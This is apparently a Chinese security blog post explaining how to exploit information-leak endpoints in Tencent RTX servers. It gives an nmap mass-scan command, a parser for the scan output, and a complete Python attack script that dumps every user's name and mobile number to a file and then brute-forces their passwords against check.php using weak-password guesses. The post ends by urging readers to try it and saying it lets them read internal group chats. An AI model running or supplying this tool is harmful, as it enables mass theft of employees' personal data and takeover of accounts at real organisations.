rtx信息泄漏利结合弱口令导致被批量社工思路

时间:2022-01-28 00:23:52

腾讯通RTX(Real Time eXchange)是腾讯公司推出的企业级实时通信平台.

rtx server 存在暴露用户信息的漏洞,通过web访问

http://RtxServerIp:8012/userlist.php #泄漏公司所有rtx用户
http://RtxServerIp:8012/getmobile.cgi?receiver= #泄漏用户手机号
http://RtxServerIp:8012/check.php #验证弱口令

脚本化攻击思路:

  1. sudo nmap -sS -T4 -Pn -p8012 xxx.xxx.xxx.0/16 -oX out.xml nmap 扫描大网段以基数来填补精度的不足,然后我们得到一个开着nmap扫描的out.xml文
  2. 分析out.xml文件提取开放8012端口的ip
  3. rtx攻击脚本处理这些ip,探测弱口令

步骤2 分析nmap结果的脚本xml.py

#!/usr/bin/env python
#
-*- coding= utf-8 -*-
import xml.etree.ElementTree as ET

# Read an nmap -oX result file and print the address of every host whose
# first listed port is reported as open (the write-up runs nmap with a
# single port, -p8012, so "first port" is that port).
tree = ET.parse("out.xml")
doc = tree.getroot()
for x in doc:
    if x.tag == 'host':
        # Positional access into <host>: child 3 is taken to be <ports> and
        # child 1 the <address> element.  This relies on nmap's element
        # ordering; any extra child (e.g. <hostnames> before <ports>) shifts
        # the indexes -- NOTE(review): confirm against the actual out.xml.
        xlist = x.getchildren()
        ports = xlist[3]
        # First <port> under <ports>, then its <state> child.
        port = ports.getchildren()[0]
        state = port.getchildren()[0]
        if state.get('state') == 'open':
            print xlist[1].get('addr')

 

步骤3 rtx server attack 脚本

#!/usr/bin/env python
#
-*-coding=utf-8-*-
#
date : 2013.12.16
#
author : l137
#
rtx hack

import threading
import urllib
import re
import sys
import getopt
import json
import threading
import httplib
import time

def usage():
    """Print the command-line help text (-u target_ip, -h for this page)."""
    print '''
Usage : ./f.py -u target_ip
-h Show this page!
'''

class postThread(threading.Thread):
    """Thread that only prints the sequence it was handed, once per element.

    Not used anywhere in this file: rtx.bruteforce builds plain
    threading.Thread objects with target=rtx.fwork instead.
    """

    def __init__(self, data):
        threading.Thread.__init__(self)
        # Iterable whose length decides how many times run() prints it.
        self.data = data

    def run(self):
        # Prints the whole of self.data for every element of self.data.
        for x in self.data:
            try:
                print self.data
            except Exception, e:
                print e


class rtx(object):
    """Probe one RTX server and run the three stages the write-up describes.

    Constructing the object does all the work (see __init__): it fetches
    /userlist.php, resolves each user's mobile number through
    /getmobile.cgi, and then posts candidate passwords to /check.php.
    All three stages are unauthenticated HTTP requests to self.port, so on
    the server side each one is a distinct, recognisable request pattern;
    requiring authentication on userlist.php and getmobile.cgi, and
    applying a per-account lockout or per-IP rate limit on check.php, is
    what removes the exposure each stage depends on.
    """
    # Target address; assigned in __init__ only after checkIp accepts it.
    ip = ''

    # Decoded JSON from /userlist.php.  Indexed and len()-ed like a list
    # of dicts carrying 'id' and 'name'; checkPhone adds a 'phone' key.
    data = ''

    # RTX web service port, the same one the URLs in the write-up use.
    port = '8012'

    # Declared here but never read or written anywhere in this file.
    fullData = ''


    def __init__(self, ip):
        """Validate ip, pull the user list, then run every stage in order.

        A network error or non-JSON body from /userlist.php ends the whole
        process via sys.exit rather than skipping the host.  An ip that
        fails checkIp only prints the banner below.
        """
        if self.checkIp(ip):
            self.ip = ip
            url = "http://"+ip+":"+self.port+"/userlist.php"
            try:
                content = urllib.urlopen(url).read()
                self.data = json.loads(content)
            except (IOError,ValueError),e:
                print "\033[1;31m"+self.ip+"\33[0m is not vulnerable!"
                sys.exit()
            self.checkVulnerable()
            #print self.data
            self.checkPhone()
            self.bruteforce()
        else:
            # Invalid address: ASCII-art banner, nothing else happens.
            print " ______________"
            print " \033[07m are you kidding me? \033[27m "
            print " \ "
            print " \ \033[1;31m,__,\033[1;m "
            print " \ \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m "
            print " \033[1;31m(__) )\ \033[1;m "
            print " \033[1;31m ||--|| \033[1;m\033[05m*\033[25m\033[1;m [ l137 | lietdai@gmail.com ]\r\n\r\n"


    @staticmethod
    def checkIp(ip):
        """Return True when ip begins with a dotted-quad IPv4 address.

        re.match anchors at the start only; the trailing \\b means text
        after the fourth octet is rejected only when it is a word
        character, so this is a format check, not a strict whole-string
        validation.
        """
        pattern = r"\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b"
        if re.match(pattern, ip):
            return True
        else:
            return False

    def checkVulnerable(self):
        """Print how many records /userlist.php returned; no further checks."""
        print "\033[1;31m Oh...I got something!!"
        print " Please wait a bit....."
        #for x in range(len(self.data)):
        # print self.data[x]
        print " "+str(len(self.data))+" records was found!! \033[0m"

    def checkPhone(self):
        """Fetch each user's mobile number and write id/name/phone to out.txt.

        One GET to /getmobile.cgi per record, with the user name appended
        unencoded as the `receiver` query value.  The raw response body is
        stored in self.data[x]['phone'] and written in clear text to
        out.txt, so that file ends up holding personal data for every
        record.  A failed write or print for one record is reported and
        the loop continues.
        """
        print "\033[1;31m Now check phone number in records.....\033[0m"
        url = "http://"+self.ip+":"+self.port+"/getmobile.cgi?receiver="
        output = file('out.txt','w')
        for x in xrange(0,len(self.data)):
            url2 = url + self.data[x]['name']
            self.data[x]['phone'] = urllib.urlopen(url2).read()
            try:
                output.write(str(self.data[x]['id'])+'\t'+self.data[x]['name']+'\t'+self.data[x]['phone']+'\n')
                print self.data[x]
            except Exception,e:
                print e
        output.close()
        print "\033[1;31m put the records int out.txt\033[0m"
        #print self.data

    def bruteforce(self):
        """Split self.data into 1-15 slices and run fwork on each in a thread.

        The thread count is read interactively (empty input means 10; a
        non-integer or a value outside 1-15 exits the process).  Integer
        division sizes the slices and the last thread takes the remainder.
        Threads are started but never joined, so this returns while the
        POSTs to /check.php are still in flight.
        """
        print "\033[1;31m Brute force starting...."
        num = raw_input(" Please input the number of threads for brute force(default 10) : ")
        print " And it will take a little time ...\033[0m"
        if num == '':
            num = 10
        else :
            try :
                num = int(num)
            except ValueError,e:
                print e
                sys.exit()
        if (num < 1) or (num > 15):
            print "threads must in 1-15"
            sys.exit()

        threads = [];
        block = len(self.data)/num
        for i in xrange(0, num):
            if i == num-1:
                data = self.data[block*i:]
            else:
                data = self.data[i*block:(i+1)*block]
            t = threading.Thread(target=self.fwork, args = (self.port, self.ip, data))
            threads.append(t)
        for i in threads:
            i.start()

    @staticmethod
    def fwork(port,ip,b):
        """POST a short fixed candidate list plus the user name itself to /check.php for each record in b.

        The inner loop rebinds `x` to the candidate password; `name` is
        dicts[-1], i.e. the user name appended just before.  A candidate is
        printed as a hit when the value of the second response header
        equals '2573' -- presumably a Content-Length that differs for the
        logged-in page; nothing in this file shows which header that is.
        On the server this is a burst of POST /check.php requests with one
        `user` and several `pwd` values per record, which is the pattern a
        lockout or rate limit on check.php would stop.
        """
        for x in xrange(0,len(b)):
            dicts = ['111111','123456','qweasd','222222','12345678','000000','qusiba','666666']
            #dicts.append(b[x]['phone'])
            dicts.append(b[x]['name'])
            for x in dicts:
                httpClient = None
                try:
                    name = dicts[-1]
                    postData = urllib.urlencode({'user':name,'pwd':x})
                    headers = {"Content-type":"application/x-www-form-urlencoded", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"};
                    httpClient = httplib.HTTPConnection(ip, port, timeout=30)
                    httpClient.request("POST", "/check.php", postData, headers)
                    response = httpClient.getresponse()
                    responseHeader = response.getheaders()
                    if responseHeader[1][1] == '2573':
                        print name,x
                except Exception, e:
                    print e
                finally:
                    # Runs even when the connection was never created.
                    httpClient.close()

    def getWeakPass(self):
        """Read password.txt line by line into self.dists.

        Not called anywhere in this file.
        """
        file_ob = open("password.txt")
        try:
            list_file = file_ob.readlines()
        finally:
            file_ob.close()
        for x in list_file:
            self.dists.append(x.strip('\n'))

def main():
    """Parse -u target_ip / -h; constructing rtx runs every stage in its __init__.

    Unknown options print the usage text, as does an empty option list.
    """
    try:
        opts, args = getopt.getopt(sys.argv[1:], "u:h", ["help"])
    except getopt.GetoptError:
        usage()
        sys.exit()
    for o,a in opts:
        if o in ("-h", "--help"):
            usage()
        elif o == "-u":
            # The instance is never used afterwards; all work happens in __init__.
            r = rtx(a)
        else :
            usage()
    if len(opts) == 0:
        usage()

# Script entry point; main() does the argument handling.
if __name__ == "__main__" :
    main()

这里会获取很多很重要公司的员工rtx帐号,进入内网后可以窃取群聊内容.大家自己试试就行...

截图:

964条记录

rtx信息泄漏利结合弱口令导致被批量社工思路

rtx信息泄漏利结合弱口令导致被批量社工思路

参考:

http://www.wooyun.org/bugs/wooyun-2010-013290